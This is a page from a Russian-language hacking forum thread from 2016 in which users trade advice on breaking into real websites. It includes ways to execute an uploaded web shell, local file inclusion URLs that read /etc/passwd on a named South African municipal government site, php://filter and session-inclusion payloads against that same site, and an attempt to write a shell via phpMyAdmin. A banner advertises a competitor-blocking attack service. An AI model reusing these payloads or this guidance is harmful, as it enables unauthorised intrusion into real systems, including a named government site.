Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 119 из 296

119

Опции темы

Поиск в этой теме

Опции просмотра

28.03.2016, 17:00

t0ma5

Постоянный

Регистрация: 10.02.2012

Сообщений: 830

С нами: 7502006

Репутация: 90

Цитата:

Сообщение от Lazy

↑
Закинул я шелл в upload : site.com/upload/shell
Но админ переписал mod_rewrite так , что в урл к файлу прибавляется автоматом .html : site.com/upload/shell.html
Сервер шелл не хочет открывать - такого файла у него нет .
Я пробую добавить null byte после имени файла в браузере и теперь имя корректно.
Но фаил все равно не открывается . И даже открывать адрес site.com/index.html%00 сервер все равно не желает .
Можно ли как-то победить rewrite или мертвый номер ?

залить свой .htaccess в котором вырубить все модреврайты к чертям, или хедлер html->php добавить в .htaccess, ну это если есть возможность свой .htaccess загрузить

𝕏 Twitter Reddit Telegram Копировать ссылку

28.03.2016, 17:49

Lazy

Познающий

Регистрация: 19.07.2011

Сообщений: 94

С нами: 7798646

Репутация: 3

Увы но htaccess никак не войдет .

Остается или победить rewrite , или искать локальных инклудов . Хотя похоже их тоже негусто .

28.03.2016, 17:59

t0ma5

Постоянный

Регистрация: 10.02.2012

Сообщений: 830

С нами: 7502006

Репутация: 90

хм как же сайт работает, то есть если на сайте динамические элементы есть, формы там всякие, то php как то прикручен

надо глянуть в сорцы страницы с какой нить формой, что там?

30.03.2016, 17:37

MDen1s

Новичок

Регистрация: 12.07.2015

Сообщений: 17

С нами: 5704886

Репутация: 0

Помогите с LFI. Есть сайт который инклудится на /etc/passwd , но я не могу проинклудить на /proc/self/envorin.

http://www.mogalakwena.gov.za/index.php?page=/etc/passwd%00

http://www.mogalakwena.gov.za/index.php?page=/proc/self/environ%00

В последнем случае нет вывода (

30.03.2016, 17:43

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

С нами: 5797046

Репутация: 40

Цитата:

Сообщение от MDen1s

↑
Помогите с LFI. Есть сайт который инклудится на /etc/passwd , но я не могу проинклудить на /proc/self/envorin.
http://www.mogalakwena.gov.za/index.php?page=/etc/passwd
%00
http://www.mogalakwena.gov.za/index.php?page=/proc/self/environ
%00
В последнем случае нет вывода (

Файл недоступен

31.03.2016, 11:51

MDen1s

Новичок

Регистрация: 12.07.2015

Сообщений: 17

С нами: 5704886

Репутация: 0

Цитата:

Сообщение от BabaDook

↑
Файл недоступен

А как-то можно проинклудить?

31.03.2016, 12:06

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

Цитата:

Сообщение от MDen1s

↑
А как-то можно проинклудить?

пробуйте другие способы, их огромное количество

31.03.2016, 13:00

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

С нами: 5797046

Репутация: 40

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.mogalakwena.gov.za/index.php?page=php://filter/convert.base64-encode/resource=index[/COLOR][/COLOR]

2) инклудить сессию

3)

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.mogalakwena.gov.za/index.php?page=http://www.mogalakwena.gov.za/index.php?page=demographics%00[/COLOR][/COLOR]

что ещё можно придумать ?

31.03.2016, 19:31

I love this game

Познающий

Регистрация: 23.12.2008

Сообщений: 81

С нами: 9148120

Репутация: 97

Есть root от phpmyadmin, знаю путь, пытаюсь залить шелл через select into outfile

мне выдает ошибку "#1 - Can't create/write to file 'путь/test.php' (Errcode: 13) "

Подскажите что можно еще придумать?